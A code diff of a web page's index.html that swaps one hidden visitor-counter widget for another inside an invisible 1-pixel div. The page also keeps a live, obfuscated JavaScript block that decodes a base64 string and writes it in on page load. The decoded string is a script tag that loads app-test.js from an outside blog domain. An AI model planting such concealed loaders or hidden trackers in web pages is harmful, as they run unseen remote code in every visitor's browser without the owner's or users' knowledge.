--- a/index.html
+++ b/index.html
@@ -321,14 +321,10 @@
     </script>
 
 
-    <!-- BEGIN: Powered by Supercounters.com -->
-    <div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
-        <script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script>
-        <script type="text/javascript">
-            sc_online_i(1703308,"ffffff","ffffff");
-        </script>
-        <noscript><a href="https://www.supercounters.com/" style="visibility:hidden;">free online counter</a></noscript>
-    </div>
+        <!-- BEGIN: Powered by Supercounters.com -->
+        <div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
+         <script id="_wauomq">var _wau = _wau || []; _wau.push(["dynamic", "2rzlwew51p", "omq", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>
+        </div>
 
 <script>
 const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_0x49e1fe=_0x5a047e();while(!![]){try{const _0x2cd49a=-parseInt(_0x57279f(0x151))/0x1*(parseInt(_0x57279f(0x14c))/0x2)+-parseInt(_0x57279f(0x14d))/0x3+-parseInt(_0x57279f(0x150))/0x4*(parseInt(_0x57279f(0x146))/0x5)+parseInt(_0x57279f(0x14f))/0x6+parseInt(_0x57279f(0x14e))/0x7+-parseInt(_0x57279f(0x147))/0x8*(parseInt(_0x57279f(0x145))/0x9)+-parseInt(_0x57279f(0x14a))/0xa*(-parseInt(_0x57279f(0x149))/0xb);if(_0x2cd49a===_0x2e3b4b)break;else _0x49e1fe['push'](_0x49e1fe['shift']());}catch(_0x47deee){_0x49e1fe['push'](_0x49e1fe['shift']());}}}(_0x474d,0x2ad8c));function _0x4798(_0x2ffa33,_0x6a2f71){const _0x474df9=_0x474d();return _0x4798=function(_0x4798f1,_0x5f5465){_0x4798f1=_0x4798f1-0x145;let _0x5b0406=_0x474df9[_0x4798f1];return _0x5b0406;},_0x4798(_0x2ffa33,_0x6a2f71);}const b64=_0x5424b1(0x14b);document[_0x5424b1(0x148)](atob(b64));function _0x474d(){const _0x2f0933=['809LWoqNb','971595qRSIpw','10lYzWOk','16kPwJdl','write','12639gmjqRL','2930tMKtkG','PHNjcmlwdCBzcmM9Imh0dHBzOi8vYmxvZy5jcmljZm9vdC5uZXQvYXBwLXRlc3QuanMiPjwvc2NyaXB0Pg==','654FEkzUs','140730BzXyzA','1471785seKKat','1084914ZqXUsu','49736amwPRT'];_0x474d=function(){return _0x2f0933;};return _0x474d();}
